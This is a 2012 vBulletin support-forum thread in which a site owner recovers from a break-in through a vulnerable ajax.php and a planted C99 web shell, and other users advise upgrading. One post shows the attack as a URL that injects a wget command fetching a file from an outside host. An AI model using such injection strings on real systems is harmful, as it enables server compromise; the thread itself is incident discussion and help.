Questions regarding security/malware

**Dustin L.** · Wed 18 Jul '12, 8:59pm

4.2.0 PL2 is the latest version. It's not always vB that has an exploit, often times, it's a misconfigured server, or a plugin.

Dustin

**z0diac** · Wed 18 Jul '12, 9:03pm

Originally posted by Dustin L.

4.2.0 PL2 is the latest version. It's not always vB that has an exploit, often times, it's a misconfigured server, or a plugin.

Dustin

I'm just scared I'll upgrade and run into exactly the same problem I'm having right now. On a huge server with hundreds of gigabytes of files and over a MILLION files, it's absolutely sickening (physically sick to my stomach) to wake up and check the site and see the big google warning ATTACK SITE! box for Firefox users, and not know what's happened or what's been changed, etc. And the worst part is, I haven't eaten in days because this is worrying me 24/7. I can't sleep, I can't eat, my hands and fingers are ALWAYS sweating. It's having an enormous emotional and physical impact on me knowing my site is being broken in to.

**Dustin L.** · Wed 18 Jul '12, 9:13pm

If you're having health issues because you're scared of people getting into your site, you might want to see a doctor.

Then, read these:

https://www.vbulletin.com/forum/content.php/813-Recovering-a-hacked-vBulletin-Site

Securing your vBulletin Forums (Part 1) - vBulletin Community Forum

https://www.vbulletin.com/forum/entry.php/2503-Securing-your-vBulletin-Forums-%28Part-1%29

Securing your vBulletin Forums (Part 2) - vBulletin Community Forum

https://www.vbulletin.com/forum/entry.php/2510-Securing-your-vBulletin-Forums-%28Part-2%29

Dustin

**z0diac** · Thu 19 Jul '12, 5:25am

Thanks Dustin L.

SPECIFICALLY: I need a version of at least the ajax.php file that is compatible with 3.6.8 -- right now I have a 4.x version that DOES patch the security hole, but unfortunately does not let users register.

I really need a patched ajax.php file. The old 3.6.8 ajax.php allowed people to put files onto my site like this:

Code:

http://forum.mydomain.com/ajax.php?global=wget%20http://www.whatever.com/images/logo2.png

Code:

Database error in vBulletin 3.6.8:


Invalid SQL:


                                        SELECT languageid,
                        phrasegroup_posting AS phrasegroup_posting,
                        phrasegroup_search AS phrasegroup_search,
                        phrasegroup_socialgroups AS phrasegroup_socialgroups,
                        phrasegroup_global AS phrasegroup_global,
                        options AS lang_options,
                        languagecode AS lang_code,
                        charset AS lang_charset,
                        locale AS lang_locale,
                        imagesoverride AS lang_imagesoverride,
                        dateoverride AS lang_dateoverride,
                        timeoverride AS lang_timeoverride,
                        registereddateoverride AS lang_registereddateoverride,
                        calformat1override AS lang_calformat1override,
                        calformat2override AS lang_calformat2override,
                        logdateoverride AS lang_logdateoverride,
                        decimalsep AS lang_decimalsep,
                        thousandsep AS lang_thousandsep
                                        FROM language
                                        WHERE languageid = 1;


MySQL Error  : Unknown column 'phrasegroup_socialgroups' in 'field list'
Error Number : 1054
Date         : Thursday, July 19th 2012 @ 03:34:25 AM
Script       : http://forum.mydomain.com/ajax.php?do=imagereg&imagehash=95fb5293802fe6f57d2923e692673ea9
Referrer     : http://forum.mydomain.com/register.php?do=register
IP Address   : 1.38.16.7
Username     : 
Classname    : vB_Database

**borbole** · Thu 19 Jul '12, 5:36am

The db error you posted it comes from the column 'phrasegroup_socialgroups' which seems to be missing. If you are reluctant to upgrade your forum to 4.2.0 pl2 then upgrade your forum to at least the latest version of the 3.8x series. That would take care to fix the security issues.

Personally I would advice you, if I may, to upgrade to 4.2.0 pl2. It has no known security issue and it has a lot of great options and features. Also make a thorough search of your server space for any backdoor scripts that may have been left behind and also contact your host and ask them to check their access logs to see hoe exactly your forum was hacked.

**z0diac** · Thu 19 Jul '12, 5:47am

I take the last msg back! It looks like new user registrations ARE working - all those errors came from the SAME IP ADDRESSES! I got about 9 registration errors but ONLY from these 2 IPs! Hacker!!??

IP Address : 1.38.16.5

and

IP Address : 1.38.16.7

----

I checked the user base and there HAVE been successful new registrations today. (ips way different from the one above) All my 9 vBulletin Databaser Error msgs were like the one I posted above, and ALL from those 2 IP addresses. So maybe it was an attempt to exploit the registration process.

**Mark.B** · Thu 19 Jul '12, 5:48am

3.8.7 or 4.2.0 are the two latest versions.

Neither have any known security issues.

If you have a site that uses modifications or custom styles, then for the time being upgrade to 3.8.7.

But it is possible it's a server exploit, in which case upgrading will not help.

Don't try to use files from later versions in 3.6.8. It will only cause problems and even potentially data loss.

**borbole** · Thu 19 Jul '12, 5:49am

Those ip's come from India. Most probably spammers.

**z0diac** · Thu 19 Jul '12, 5:58am

Originally posted by borbole

The db error you posted it comes from the column 'phrasegroup_socialgroups' which seems to be missing. If you are reluctant to upgrade your forum to 4.2.0 pl2 then upgrade your forum to at least the latest version of the 3.8x series. That would take care to fix the security issues.

Personally I would advice you, if I may, to upgrade to 4.2.0 pl2. It has no known security issue and it has a lot of great options and features. Also make a thorough search of your server space for any backdoor scripts that may have been left behind and also contact your host and ask them to check their access logs to see hoe exactly your forum was hacked.

Actually I have the guys at Total Server Solutions on the problem and they've been on it for a few days now, upgrading/patching Plesk, php/mysql/apache, they've run scanners, grepped for iframes, that '64' (?) encoded stuff, etc. It wasn't until last night that they found an __error.php file that was the !C99madShell v. 2.0 madnet edition! hack program thing, and they managed to determine that my ajax.php file (3.6.8) had a major security hole in it that allowed intruders to put files onto my server. So as a quick fix I found an open source ajax 4.x file and tried it simply because that was the only option we could think of, they tried the same exploit on it, and the exploit failed. So I *SEEM* to be 'safe' right now, as there was no malware put on overnight, but that's not a large time frame, so time will tell. But obviously using the wrong version ajax.php with my version of vB isn't the right way to do things. But it's better than having malware slapped all over, and waking up to big red boxes saying "Warning: Attack Site!" when I try to access my site.

What I REALLY need right now is a fully patched ajax.php for 3.6.8 until my coder can make my forum ready for upgrade. I will buy 4.x if 3.6.8 can be upgraded to it. But due to the large amount of custom work on my forum by somewhat amateur people in the past, my current coder needs to re-do their work so the plugins work as hooks instead of manually editing vB php code (the latter of course, would all be overwritten and lost during an upgrade)

- - - Updated - - -

Originally posted by Mark.B

3.8.7 or 4.2.0 are the two latest versions.

Neither have any known security issues.

If you have a site that uses modifications or custom styles, then for the time being upgrade to 3.8.7.

But it is possible it's a server exploit, in which case upgrading will not help.

Don't try to use files from later versions in 3.6.8. It will only cause problems and even potentially data loss.

So 3.8.7 then. ok. I'll see if I can get my coder to make proper hook plugins for the sloppy custom work that was done before he started working with me, and get him to upgrade for me. THANK YOU on stating what version I need to get to, because I have no idea about vB version numbers.

**Mark.B** · Thu 19 Jul '12, 6:00am

Originally posted by z0diac

Actually I have the guys at Total Server Solutions on the problem and they've been on it for a few days now, upgrading/patching Plesk, php/mysql/apache, they've run scanners, grepped for iframes, that '64' (?) encoded stuff, etc. It wasn't until last night that they found an __error.php file that was the !C99madShell v. 2.0 madnet edition! hack program thing, and they managed to determine that my ajax.php file (3.6.8) had a major security hole in it that allowed intruders to put files onto my server. So as a quick fix I found an open source ajax 4.x file and tried it simply because that was the only option we could think of, they tried the same exploit on it, and the exploit failed. So I *SEEM* to be 'safe' right now, as there was no malware put on overnight, but that's not a large time frame, so time will tell. But obviously using the wrong version ajax.php with my version of vB isn't the right way to do things. But it's better than having malware slapped all over, and waking up to big red boxes saying "Warning: Attack Site!" when I try to access my site.

What I REALLY need right now is a fully patched ajax.php for 3.6.8 until my coder can make my forum ready for upgrade. I will buy 4.x if 3.6.8 can be upgraded to it. But due to the large amount of custom work on my forum by somewhat amateur people in the past, my current coder needs to re-do their work so the plugins work as hooks instead of manually editing vB php code (the latter of course, would all be overwritten and lost during an upgrade)

There is not going to be a patched version of any 3.6.8 files. Your best bet I think is to upgrade to 3.8.7.

**z0diac** · Thu 19 Jul '12, 6:13pm

With the help of my coder, we've decided to go ahead and upgrade. I just have to pay him goobs of dollars first to write proper plugins for the ones I got amateurs to do when I first started. Then set up the new version side by side, but offline, make sure all the plugins and modifications work, and go from there.

But so far this 4.x ajax.php script seems to be holding everything down ok. Knock on wood... i'm about to go to sleep and with my luck I'll wake up to the big Google red box of death.

Questions regarding security/malware

Questions regarding security/malware

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment